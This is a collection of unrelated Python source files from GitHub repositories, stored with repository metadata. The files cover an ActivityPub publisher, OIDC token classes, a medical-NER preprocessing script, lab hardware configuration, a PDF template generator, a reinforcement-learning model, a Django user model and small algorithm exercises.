def handle_as2_recipient(self):\n if self.recipient == AS2_PUBLIC:\n return self.handle_public()\n\n obj = await AS2Object.fetch_from_uri(self.recipient)\n if isinstance(obj, AS2Collection):\n return self.handle_collection(obj)\n elif isinstance(obj, Actor):\n return self.handle_actor(obj)\n\n return self.fatality()\n\n async def handle_ap_inbox(self):\n # We can't deliver on behalf of remote users.\n if not self.originator.local():\n logging.info('PUBLISHER: WTF: Trying to deliver messages on behalf of remote user %s.', self.originator.id)\n return self.completed()\n\n user = self.originator.user()\n\n payload = self.activity.serialize()\n uri = urllib.parse.urlsplit(self.recipient)\n digest = base64.b64encode(hashlib.sha256(payload.encode('utf-8')).digest()).decode('utf-8')\n\n headers = {\n '(request-target)': 'post %s' % uri.path,\n 'Content-Length': str(len(payload)),\n 'Content-Type': 'application/activity+json',\n 'User-Agent': self.publisher.app.user_agent,\n 'Host': uri.netloc,\n 'Digest': 'SHA-256=' + digest,\n 'Date': time.strftime('%a, %d %b %Y %H:%M:%S GMT', time.gmtime()),\n }\n\n privkey = user.privkey()\n\n signed_headers = self.publisher.signer.sign(headers, privkey, self.originator.publicKey['id'])\n\n try:\n async with aiohttp.ClientSession() as session:\n async with session.post(self.recipient, data=payload, headers=signed_headers) as resp:\n if resp.status == 202:\n return self.completed()\n elif resp.status >= 500:\n return self.error()\n\n resp_payload = await resp.text()\n logging.debug('%r >> %r', self.recipient, resp_payload)\n return self.completed()\n except Exception as e:\n logging.info('Exception %r when pushing to %s.', e, 
self.recipient)\n            return self.error()\n\n    async def publish(self):\n        if not self.originator:\n            logging.info('WTF: Publish request without originator. %r', self.activity.serialize())\n            return self.fatality()\n\n        logging.info('Publishing %s to %s (type %d).', self.activity.id, self.recipient, self.kind)\n\n        if self.kind == AS2_RECIPIENT:\n            return (await self.handle_as2_recipient())\n        elif self.kind == AP_INBOX:\n            return (await self.handle_ap_inbox())\n        elif self.kind == LOCAL_DELIVERY:\n            return (await self.handle_local_delivery())\n\n        logging.error('Not sure how to handle publish request type %d.', self.kind)\n        return self.fatality()\n\n    def completed(self):\n        self.complete = True\n        return self\n\n    def fatality(self):\n        self.error_count = 9999999\n        return self\n\n    def error(self):\n        self.error_count += 1\n        return self\n\n    def maybe_cull(self):\n        if self.error_count > 3:\n            logging.info('Culling publish request for activity %s to %s due to excessive errors (%d).',\n                         self.activity.id, self.recipient, self.error_count)\n            return True\n\n        return self.complete\n\n\nclass PublisherWorker:\n    def __init__(self, app):\n        self.app = app\n        self.queue = []\n        self.event = asyncio.Event()\n        self.signer = HTTPSignatureSigner()\n        self.listeners = {}\n\n        asyncio.ensure_future(self.work_loop())\n        asyncio.ensure_future(self.wakeup_loop())\n\n    def add_activity(self, activity: AS2Activity, recipient: str, kind=AS2_RECIPIENT) -> PublisherRequest:\n        logging.debug('Enqueueing activity %s for publishing to recipient %r (kind %d).', activity.id, recipient, kind)\n\n        pr = PublisherRequest(self, activity, recipient, kind)\n        self.queue += [pr]\n        self.event.set()\n        return pr\n\n    def cull_queue(self):\n        self.queue = [pr for pr in self.queue if not pr.maybe_cull()]\n\n    async def process_requests(self):\n        logging.debug('Publisher work queue has %d items.', len(self.queue))\n\n        if len(self.queue) == 0:\n            return\n\n        await asyncio.wait([pr.publish() for pr in self.queue])\n\n    async def work_loop(self):\n        logging.info('Starting publisher worker.')\n\n        while True:\n            self.event.clear()\n            await self.process_requests()\n            self.cull_queue()\n            await self.event.wait()\n\n    async def wakeup_loop(self):\n        sleep_time = 10\n\n        logging.info('Publisher worker will sleep for a maximum of %d seconds.', sleep_time)\n\n        while True:\n            await asyncio.sleep(sleep_time)\n            self.event.set()\n\n    def listeners_for_uri(self, uri: str) -> list:\n        return self.listeners.get(uri, [])\n\n    def attach_uri_listener(self, uri: str, listener):\n        listeners = self.listeners_for_uri(uri)\n        self.listeners[uri] = listeners + [listener]\n\n    async def notify_listeners(self, uri: str, activity):\n        tasks = [listener(uri, activity) for listener in self.listeners_for_uri(uri)]\n        if tasks:\n            await asyncio.wait(tasks, timeout=5)\n","repo_name":"kaniini/jejune","sub_path":"jejune/workers/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":7692,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"5"} +{"seq_id":"34400748693","text":"from CMeEE_trans import *\nfrom CMeEE_reshape import *\nimport CMeEE_stats\nimport CMeEE_wash\nimport os\n\nos.makedirs('./o/reshape', exist_ok=True)\nos.makedirs('./o/stats', exist_ok=True)\nos.makedirs('./o/wash', exist_ok=True)\nos.makedirs('./o/trans', exist_ok=True)\n\nif __name__ == '__main__':\n    tasks = {\n        '1': 'Offline training: re-split the online train-dev data into offline train-dev-test',\n        '2': 'Prediction: convert the online test.json into test.CMeEE.bmes',\n        '3': 'Online submission: convert the predicted test.CMeEE.out.bmes into test.CMeEE.out.json'\n    }\n\n    task = 1\n\n    if task == 1:\n        print('[Merge] combining the train and dev sets and writing to file...')\n        json_data_all = merge('i/CMeEE_train.json', 'i/CMeEE_dev.json')\n        jd2jf(json_data_all, 'o/reshape/CMeEE_all.json')\n        print('Done.')\n\n        print('[Wash] cleaning the merged data and writing to file...')\n        json_data_all_washed = CMeEE_wash.main(json_data_all)\n        jd2jf(json_data_all_washed, 'o/wash/CMeEE_all_washed.json')\n        print('Done.')\n\n        print('[Stats] summarizing the cleaned data and writing to file...')\n        CMeEE_stats.main(\n            json_data_all_washed,\n            'after washing (long sentences left unwashed)',\n            'o/stats/CMeEE_all_washed_sentence.csv',\n            'o/stats/CMeEE_all_washed_entities.csv',\n            'o/stats/CMeEE_sum.csv')\n        print('Done.')\n\n        print('[Split & convert] splitting the cleaned data and writing to file...')\n        json_train, json_dev, json_test = split(json_data_all, 7, 2, 1)\n        jd2bf(json_train, 'o/trans/train.char.bmes')\n        jd2bf(json_dev, 'o/trans/dev.char.bmes')\n        jd2bf(json_test, 'o/trans/test.char.bmes')\n        print('Done.')\n\n    elif task == 2:\n        jf2bf('i/CMeEE_test.json', 'o/trans/test.CMeEE.bmes')\n        json_test = bf2jd('o/trans/test.CMeEE.bmes')\n        CMeEE_stats.main(\n            json_test,\n            'test.bmes before prediction',\n            'o/stats/test_1_sentence.csv',\n            'o/stats/test_1_entities.csv',\n            'o/stats/test_sum.csv')\n\n    elif task == 3:\n        json_output = bf2jd('o/CMeEE_out.bmes')\n        jd2jf(json_output, 'o/CMeEE-test.json')\n        CMeEE_stats.main(\n            json_output,\n            'test.bmes after prediction',\n            'o/stats/test_2_sentence.csv',\n            'o/stats/test_2_entities.csv',\n            'o/stats/test_sum.csv')\n","repo_name":"Esirn/CMeEE_preprocess","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"1069599102","text":"import glob\nimport cv2\nimport os\n\nimage_list = []\nimage_names = []\n\nk = 413\nfor filename in glob.glob('C:/Users/Deeathex/PycharmProjects/TestSignLang1/SavedImages/*.JPG'):\n    original_image = cv2.imread(filename)\n    image_list.append(original_image)\n    image_name = filename.split(\"\\\\\")\n    new_name = image_name[0]+\"/\" + str(k) + \".JPG\"\n    print(new_name)\n    k += 1\n    image_names.append(new_name)\n    # os.remove(filename)\n\ni = 0\nfor original_image in image_list:\n    cv2.imwrite(image_names[i], original_image)\n    i = i + 1\n","repo_name":"Deeathex/SignLanguageRecognition","sub_path":"renameImages.py","file_name":"renameImages.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26207947595","text":"from typing import Optional\nfrom uuid import uuid1\n\nfrom oidcmsg.impexp import ImpExp\nfrom oidcmsg.time_util import utc_time_sans_frac\n\n\nclass MintingNotAllowed(Exception):\n    pass\n\n\nclass Item(ImpExp):\n    parameter = {\n        \"expires_at\": 0,\n        \"issued_at\": 0,\n        \"not_before\": 0,\n        \"revoked\": bool,\n        \"usage_rules\": {},\n        \"used\": 0,\n    }\n\n    def __init__(\n        self,\n        usage_rules: Optional[dict] = None,\n        issued_at: int = 0,\n        expires_in: int = 0,\n        expires_at: int = 0,\n        not_before: int = 0,\n        revoked: bool = False,\n        used: int = 0,\n    ):\n        ImpExp.__init__(self)\n        self.issued_at = issued_at or utc_time_sans_frac()\n        self.not_before = not_before\n        if expires_at == 0 and expires_in != 0:\n            self.set_expires_at(expires_in)\n        else:\n            self.expires_at = expires_at\n\n        self.revoked = revoked\n        self.used = used\n        self.usage_rules = usage_rules or {}\n\n    def set_expires_at(self, expires_in):\n        self.expires_at = utc_time_sans_frac() + expires_in\n\n    def max_usage_reached(self):\n        if \"max_usage\" in self.usage_rules:\n            return self.used >= self.usage_rules[\"max_usage\"]\n        else:\n            return False\n\n    def is_active(self, now=0):\n        if 
self.max_usage_reached():\n return False\n\n if self.revoked:\n return False\n\n if now == 0:\n now = utc_time_sans_frac()\n\n if self.not_before:\n if now < self.not_before:\n return False\n\n if self.expires_at:\n if now > self.expires_at:\n return False\n\n return True\n\n def revoke(self):\n self.revoked = True\n\n\nclass SessionToken(Item):\n parameter = Item.parameter.copy()\n parameter.update(\n {\n \"based_on\": \"\",\n \"claims\": {},\n \"id\": \"\",\n \"name\": \"\",\n \"resources\": [],\n \"scope\": [],\n \"token_class\": \"\",\n \"usage_rules\": {},\n \"used\": 0,\n \"value\": \"\",\n }\n )\n\n def __init__(\n self,\n token_class: str = \"\",\n value: str = \"\",\n based_on: Optional[str] = None,\n usage_rules: Optional[dict] = None,\n issued_at: int = 0,\n expires_in: int = 0,\n expires_at: int = 0,\n not_before: int = 0,\n revoked: bool = False,\n used: int = 0,\n id: str = \"\",\n scope: Optional[list] = None,\n claims: Optional[dict] = None,\n resources: Optional[list] = None,\n ):\n Item.__init__(\n self,\n usage_rules=usage_rules,\n issued_at=issued_at,\n expires_in=expires_in,\n expires_at=expires_at,\n not_before=not_before,\n revoked=revoked,\n used=used,\n )\n\n self.token_class = token_class\n self.value = value\n self.based_on = based_on\n self.id = id or uuid1().hex\n self.set_defaults()\n self.scope = scope or []\n self.claims = claims or {} # default is to not release any user information\n self.resources = resources or []\n self.name = self.__class__.__name__\n\n def set_defaults(self):\n pass\n\n def register_usage(self):\n self.used += 1\n\n def has_been_used(self):\n return self.used != 0\n\n def supports_minting(self, token_class):\n _supports_minting = self.usage_rules.get(\"supports_minting\")\n if _supports_minting is None:\n return False\n else:\n return token_class in _supports_minting\n\n\nclass AccessToken(SessionToken):\n parameter = SessionToken.parameter.copy()\n parameter.update({\"token_type\": \"\"})\n\n def __init__(\n self,\n token_class: str = \"\",\n value: str = \"\",\n based_on: Optional[str] = None,\n usage_rules: Optional[dict] = None,\n issued_at: int = 0,\n expires_in: int = 0,\n expires_at: int = 0,\n not_before: int = 0,\n revoked: bool = False,\n used: int = 0,\n id: str = \"\",\n scope: Optional[list] = None,\n claims: Optional[dict] = None,\n resources: Optional[list] = None,\n token_type: Optional[str] = \"bearer\",\n ):\n SessionToken.__init__(\n self,\n token_class=token_class,\n value=value,\n based_on=based_on,\n usage_rules=usage_rules,\n issued_at=issued_at,\n expires_in=expires_in,\n expires_at=expires_at,\n not_before=not_before,\n revoked=revoked,\n used=used,\n id=id,\n scope=scope,\n claims=claims,\n resources=resources,\n )\n\n self.token_type = token_type\n\n\nclass AuthorizationCode(SessionToken):\n def set_defaults(self):\n if \"supports_minting\" not in self.usage_rules:\n self.usage_rules[\"supports_minting\"] = [\n \"access_token\",\n \"refresh_token\",\n \"id_token\",\n ]\n\n self.usage_rules[\"max_usage\"] = 1\n\n\nclass RefreshToken(SessionToken):\n def set_defaults(self):\n if \"supports_minting\" not in self.usage_rules:\n self.usage_rules[\"supports_minting\"] = [\"access_token\", \"refresh_token\"]\n\n\nclass IDToken(SessionToken):\n parameter = SessionToken.parameter.copy()\n parameter.update({\"session_id\": \"\"})\n\n def __init__(\n self,\n token_class: str = \"\",\n value: str = \"\",\n based_on: Optional[str] = None,\n usage_rules: Optional[dict] = None,\n issued_at: int = 0,\n expires_in: int = 
0,\n expires_at: int = 0,\n not_before: int = 0,\n revoked: bool = False,\n used: int = 0,\n id: str = \"\",\n session_id: str = \"\",\n scope: Optional[list] = None,\n claims: Optional[dict] = None,\n resources: Optional[list] = None,\n token_type: Optional[str] = \"bearer\",\n ):\n SessionToken.__init__(\n self,\n token_class=token_class,\n value=value,\n based_on=based_on,\n usage_rules=usage_rules,\n issued_at=issued_at,\n expires_in=expires_in,\n expires_at=expires_at,\n not_before=not_before,\n revoked=revoked,\n used=used,\n id=id,\n scope=scope,\n claims=claims,\n resources=resources,\n )\n\n self.session_id = session_id\n\n\nSHORT_TYPE_NAME = {\"authorization_code\": \"A\", \"access_token\": \"T\", \"refresh_token\": \"R\"}\n","repo_name":"IdentityPython/oidc-op","sub_path":"src/oidcop/session/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"5"} +{"seq_id":"73017305113","text":"# List1-7th-bus stop problem\ntry:\n T = int(input('Type test case number (T)'))\nexcept ValueError:\n print('Type positive integer')\nif T < 1:\n raise ValueError('T should be a positive integer')\nfor test_case in range(1, T + 1):\n print('Type three positive integers sepearated by white space: K N M \\\n \\nK: charging capacity - number of bus stops without charging,\\\n \\nN: Total number of bus stops, \\\n \\nM: Number of charging stations')\n try:\n K, N, M = map(int, input().split())\n except ValueError:\n print('ValueError: Type integers separated by whitespace')\n if not all(1 <= set_val <= 100 for set_val in [K, N, M]):\n raise ValueError('All input should be between 1 and 100')\n if M > N:\n raise ValueError('M <= N')\n try:\n charging_stop = list(map(int, input('Type charging station bus stop \\\n numbers seperated by whitespace').split()))\n except ValueError:\n print('ValueError: Type integers separated by whitespace')\n if len(charging_stop) != M:\n raise ValueError(f'Input array size should be {M}')\n current_stop = 0\n charging_number = 0\n next_charging_idx = 0\n while current_stop < N:\n # If cur+K => N then we don't need to charge, so end\n if ((current_stop + K) >= N):\n print(f\"#{test_case} {charging_number}\")\n break\n else:\n # If there is no available next charging stop\n # (next charging stop index= M, if we increment it by 1)\n if next_charging_idx >= (M):\n # Fail to arrive terminal stop\n print(f\"#{test_case} 0\")\n break\n else:\n # there is available charing stop.\n if current_stop + K < charging_stop[next_charging_idx]:\n # it cannot arrive so fail.\n print(f\"#{test_case} 0\")\n break\n else:\n # Now I need to find 'minimum number'\n # so find the maximum charging stop number satisfying\n # \"current_Stop_number+K >= nextcharging stop number\"\n charging_number = charging_number+1\n while current_stop + K >= charging_stop[next_charging_idx]:\n if next_charging_idx == M-1:\n # this is when first trial was the last stop\n next_charging_idx = next_charging_idx + 1\n break\n else:\n # next_charging_stop_index(SELECT lasttrainedat from lasttrained)\"\n rows = self.get(query)\n return rows\n","repo_name":"lakshmanmallidi/AttendaceTrackingWithFaceRecognition","sub_path":"DbOperations.py","file_name":"DbOperations.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"71945417432","text":"import numpy as np\n#router ip 192.168.15.128\n\nreadout_length = 
1000\n\nQ1_readout_frequency = 156.03e6\nQ2_readout_frequency = 129.6373e6\n\n\n\nconfig = {\n\n \"version\": 1,\n\n \"controllers\": {\n \"con1\": {\n\n \"analog_outputs\": {\n 1: {\"offset\": 0.0}, # Readout\n 2: {\"offset\": 0.0}, # Q1_R\n 3: {\"offset\": 0.0}, # Q1_L\n 4: {\"offset\": 0.0}, # Q2_R\n 5: {\"offset\": 0.0}, # Q2_L\n },\n\n \"digital_outputs\": {\n 1: {},\n },\n\n \"analog_inputs\": {\n 1: {\"offset\": 0.21164},\n 2: {\"offset\": 0.0},\n },\n\n }\n },\n\n \"elements\": {\n\n \"Q1_R\": {\n \"singleInput\": {\n \"port\": (\"con1\", 2)\n },\n 'intermediate_frequency': 0e6,\n 'hold_offset': {'duration':200}, #hold offset to make the element \"sticky\", the duration sets the ramp to zero duration see :https://qm-docs.qualang.io/qm_config.html#null%2Fpaths%2F~1%2Fget\n 'operations': {\n 'CW': \"CW\",\n },\n },\n\n \"Q1_L\": {\n \"singleInput\": {\n \"port\": (\"con1\", 3)\n },\n 'intermediate_frequency': 0e6,\n 'hold_offset': {'duration':200}, #see above\n 'operations': {\n 'CW': \"CW\",\n },\n },\n\n \"Q2_R\": {\n \"singleInput\": {\n \"port\": (\"con1\", 4)\n },\n 'intermediate_frequency': 0e6,\n 'operations': {\n 'CW': \"CW\",\n },\n },\n\n \"Q2_L\": {\n \"singleInput\": {\n \"port\": (\"con1\", 5)\n },\n 'intermediate_frequency': 0e6,\n 'operations': {\n 'CW': \"CW\",\n },\n },\n\n \"Q1_readout\": {\n \"singleInput\": {\n \"port\": (\"con1\", 1)\n },\n \"intermediate_frequency\": Q1_readout_frequency,\n \"operations\": {\n \"readout_pulse_0_2\": \"readout_pulse_0_2\",\n \"readout_pulse_0_1\": \"readout_pulse_0_1\",\n \"readout_pulse_0_05\": \"readout_pulse_0_05\",\n \"readout_pulse_0_01\": \"readout_pulse_0_01\",\n \"readout_pulse_0_0001\": \"readout_pulse_0_0001\",\n },\n \"outputs\": {\"out1\": (\"con1\", 1)},\n \"time_of_flight\": 180+190-2,\n \"smearing\": 0,\n },\n\n \"Q2_readout\": {\n \"singleInput\": {\n \"port\": (\"con1\", 1)\n },\n \"intermediate_frequency\": Q2_readout_frequency,\n \"operations\": {\n \"readout_pulse_0_05\": \"readout_pulse_0_05\",\n },\n \"outputs\": {\"out1\": (\"con1\", 1)},\n \"time_of_flight\": 180,\n \"smearing\": 0,\n },\n\n },\n\n \"pulses\": {\n\n \"CW\": {\n \"operation\": \"control\",\n \"length\": 100,\n \"waveforms\": {\"single\": \"const_wf\"},\n },\n\n \"readout_pulse_0_2\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_2\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_1\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_1\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_05\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_05\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_01\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_01\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_001\": {\n \"operation\": \"measurement\",\n \"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_001\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n \"readout_pulse_0_0001\": {\n \"operation\": \"measurement\",\n 
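# editor's note: lowest-amplitude readout pulse defined in this config\n            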
\"length\": readout_length,\n \"waveforms\": {\"single\": \"readout_wf_0_0001\"},\n \"integration_weights\": {\n \"cos\": \"cos\",\n \"sin\": \"sin\",\n },\n 'digital_marker': 'ON'\n },\n\n\n\n },\n\n \"waveforms\": {\n\n \"const_wf\": {\"type\": \"constant\", \"sample\": 0.05*7.063},\n\n \"zero_wf\": {\"type\": \"constant\", \"sample\": 0.0},\n\n \"readout_wf_0_2\": {\"type\": \"constant\", \"sample\": 0.2},\n\n \"readout_wf_0_1\": {\"type\": \"constant\", \"sample\": 0.1},\n\n \"readout_wf_0_05\": {\"type\": \"constant\", \"sample\": 0.05},\n\n \"readout_wf_0_01\": {\"type\": \"constant\", \"sample\": 0.01},\n\n \"readout_wf_0_001\": {\"type\": \"constant\", \"sample\": 0.001},\n\n \"readout_wf_0_0001\": {\"type\": \"constant\", \"sample\": 0.0001},\n\n },\n\n \"digital_waveforms\": {\n \"ON\": {\"samples\": [(1, 0)]}\n },\n\n \"integration_weights\": {\n\n \"cos\": {\n \"cosine\": [(1.0, readout_length)],\n \"sine\": [(0.0, readout_length)],\n },\n\n \"sin\": {\n \"cosine\": [(0.0, readout_length)],\n \"sine\": [(1.0, readout_length)],\n },\n\n },\n\n}","repo_name":"qdev-dk/QMachine","sub_path":"docs/example_notebooks/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7308327807","text":"from fpdf import FPDF\nimport pandas as pd\n\npdf = FPDF(orientation=\"P\", unit=\"mm\", format=\"A4\")\npdf.set_auto_page_break(auto=False, margin=0)\n\ndf = pd.read_csv(\"topics.csv\")\n\nfor index, row in df.iterrows():\n pdf.add_page()\n\n # Set the header\n pdf.set_font(family=\"Times\", style=\"B\", size=24)\n pdf.set_text_color(100, 100, 100)\n # RGB colours. You can assign it from 0-254.\n pdf.cell(w=0, h=12, txt=row[\"Topic\"], align=\"L\", ln=1)\n # Cell's width, height(recommended font size), align left side, ln = break line\n for y in range(30, 298, 10):\n pdf.line(10, y, 200, y)\n # x1, y1, x2, y2 co-ordinates in mm, coz you assigned it in mm.\n\n # Set the footer\n pdf.ln(267)\n pdf.set_font(family=\"Times\", style=\"I\", size=8)\n pdf.set_text_color(180, 180, 180)\n pdf.cell(w=0, h=10, txt=row[\"Topic\"], align=\"R\")\n\n for i in range(row[\"Pages\"] - 1):\n pdf.add_page()\n # range represents a list. 
Suppose range(3) represents [0, 1, 2] means i -> 0, 1, 2.\n # Why -1 means coz already 1 page is created in parent for loop.\n for y in range(20, 298, 10):\n pdf.line(10, y, 200, y)\n\n # Set the footer\n pdf.ln(279)\n # 267 + 12(Cell height) = 279\n pdf.set_font(family=\"Times\", style=\"I\", size=8)\n pdf.set_text_color(180, 180, 180)\n pdf.cell(w=0, h=10, txt=row[\"Topic\"], align=\"R\")\n\npdf.output(\"output.pdf\")\n","repo_name":"Gowtham-sr/pdf-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"72833611353","text":"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Actor(nn.Module):\n def __init__(self, n_states, n_actions):\n super().__init__()\n self.n_states = n_states\n self.n_actions = n_actions\n\n self.fc1 = nn.Linear(in_features=self.n_states, out_features=64)\n self.fc2 = nn.Linear(in_features=64, out_features=64)\n self.fc_linear = nn.Linear(in_features=64, out_features=1)\n self.fc_angular = nn.Linear(in_features=64, out_features=1)\n\n # self.log_std = nn.Parameter(torch.full((self.n_actions,),-2.5))\n self.log_std = nn.Parameter(torch.tensor([-4.0, -2.5]))\n def forward(self, x):\n\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n \n mean_linear = F.tanh(F.relu(self.fc_linear(x)))\n mean_angular = F.tanh(self.fc_angular(x))\n \n mean = torch.cat([mean_linear, mean_angular], dim=-1) \n \n std = self.log_std.exp().expand_as(mean)\n \n return mean, std\n\n\n\nclass Critic(nn.Module):\n def __init__(self, n_states):\n super().__init__()\n self.n_states = n_states\n self.fc1 = nn.Linear(in_features=self.n_states, out_features=64)\n self.fc2 = nn.Linear(in_features=64, out_features=64)\n self.fc3 = nn.Linear(in_features=64, out_features=1)\n def forward(self, x):\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n \n","repo_name":"Suptree/phers_framework","sub_path":"src/non_obstacle_stage_parallel/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36723082375","text":"import os\nimport sys\nimport pkgutil\nfrom collections import OrderedDict\n\npkg_dir = os.path.dirname(__file__)\nfor (module_loader, name, ispkg) in pkgutil.iter_modules([pkg_dir]):\n pkgutil.importlib.import_module('.' 
+ name, __package__)\n\n# -----------------------------------------------------------------------------\n# Module interface\n# -----------------------------------------------------------------------------\n\n# Usage:\n#\n# from pal.filters import filters\n# registers = filters[\"filter_name\"].filter_exclusive(registers)\n# registers = filters[\"filter_name\"].filter_inclusive(registers)\n\nfilters = OrderedDict()\nfilters[\"aarch32\"] = aarch32.AArch32RegisterFilter()\nfilters[\"aarch64\"] = aarch64.AArch64RegisterFilter()\nfilters[\"activity_monitor\"] = activity_monitor.ActivityMonitorRegisterFilter()\nfilters[\"deprecated\"] = deprecated.DeprecatedRegisterFilter()\nfilters[\"external\"] = external.ExternalRegisterFilter()\nfilters[\"gic\"] = gic.GICRegisterFilter()\nfilters[\"irregular_size\"] = irregular_size.IrregularSizeFilter()\nfilters[\"loregion\"] = loregion.LORegionRegisterFilter()\nfilters[\"misc\"] = misc.MiscelaneousRegisterFilter()\nfilters[\"mpam\"] = mpam.MPAMRegisterFilter()\nfilters[\"no_access_mechanism\"] = no_access_mechanism.NoAccessMechanismFilter()\nfilters[\"scxtnum\"] = scxtnum.SCXTNUMRegisterFilter()\nfilters[\"statistical_profiling\"] = \\\n statistical_profiling.StatisticalProfilingRegisterFilter()\nfilters[\"sve\"] = sve.SVERegisterFilter()\nfilters[\"trace\"] = trace.TraceRegisterFilter()\nfilters[\"invalid\"] = invalid.InvalidRegisterFilter()\n","repo_name":"Bareflank/pal","sub_path":"pal/filter/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"5"} +{"seq_id":"31594505913","text":"from django.db import models\nfrom django.conf import settings\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom django.utils.translation import gettext_lazy as _\nfrom user import managers\n\n# Create your models here.\n\n\nclass User(AbstractBaseUser, PermissionsMixin):\n \"\"\"Model definition for User.\"\"\"\n\n first_name = models.CharField(max_length=250, null=True)\n middle_name = models.CharField(max_length=250, null=True, blank=True)\n last_name = models.CharField(max_length=250, null=True)\n username = models.CharField(max_length=250, unique=True, null=True)\n email = models.EmailField(max_length=250, unique=True)\n employee_id = models.CharField(max_length=250, unique=True, null=True, blank=True)\n is_active = models.BooleanField(default=True)\n is_staff = models.BooleanField(default=False)\n is_employee = models.BooleanField(default=False)\n is_superuser = models.BooleanField(default=False)\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n\n objects = managers.UserManager()\n\n # This is necessary as the fields are switched\n USERNAME_FIELD = 'email'\n EMAIL_FIELD = 'username'\n EMPLOYEE_ID_FIELD = 'employee_id'\n\n class Meta:\n \"\"\"Meta definition for User.\"\"\"\n ordering = ['id']\n verbose_name = _(\"User\")\n verbose_name_plural = _(\"Users\")\n\n def __str__(self):\n \"\"\"String representation of User.\"\"\"\n try: \n return self.full_name()\n except Exception:\n return str(self.id)\n \n def full_name(self):\n if self.first_name and self.last_name and self.middle_name:\n return f\"{self.last_name} {self.first_name} {self.middle_name}\"\n elif self.first_name and self.last_name:\n return f\"{self.last_name} {self.first_name}\"\n else:\n return 
f\"{self.email}\"\n","repo_name":"folakeyz/techleft-client","sub_path":"backend/user/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18832865963","text":"'''\nsorts the directed acyclic graph(DAG) in topological order\n'''\nfrom AdjacencyList import *\nimport copy\n\nclass TopologicalSorting:\n def __init__(self):\n self.graph = AdjacencyList(True)\n self.graphPrepare()\n\n def graphPrepare(self):\n self.graph.addVertex(1)\n self.graph.addVertex(2)\n self.graph.addVertex(3)\n self.graph.addVertex(4)\n self.graph.addVertex(5)\n self.graph.addVertex(6)\n self.graph.addVertex(7)\n\n self.graph.addEdge(1,3)\n self.graph.addEdge(2,3)\n self.graph.addEdge(3,5)\n self.graph.addEdge(2,4)\n self.graph.addEdge(5,6)\n self.graph.addEdge(4,6)\n self.graph.addEdge(6,7)\n\n def initSorting(self):\n self.visited = {}\n self.reversedTopologicalArray = []\n self.topologicalArray = []\n self.allVertexes = self.graph.vertexs.keys()\n for key in self.allVertexes:\n try:\n self.visited[key]\n continue\n except:\n self.visited[key] = True\n self.dfs(key, 0)\n self.reversedTopologicalArray.append(key)\n self.topologicalArray = self.reversedTopologicalArray.copy()\n self.topologicalArray.reverse()\n\n def dfs(self, vertex, number=0):\n try:\n while True:\n value = self.graph.vertexs[vertex][number]\n try:\n self.visited[value]\n number = number + 1\n except:\n self.visited[value] = True\n self.dfs(value, 0)\n self.reversedTopologicalArray.append(value)\n break\n except:\n return None\n\nts = TopologicalSorting()\nts.initSorting()\nprint(\"reversedTopologicalArray: \", ts.reversedTopologicalArray)\nprint(\"topologicalArray: \", ts.topologicalArray)","repo_name":"shubhamsinghrathi/algorithms","sub_path":"graph/topologicalSorting.py","file_name":"topologicalSorting.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74108898713","text":"import datetime\n\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\n\nfrom lndmanage.lib.node import LndNode\n\n\ndef plot_forwardings(forwarding_events):\n \"\"\"\n Plots a time series of the forwarding amounts.\n\n :param forwarding_events:\n \"\"\"\n times = []\n amounts = []\n for f in forwarding_events:\n 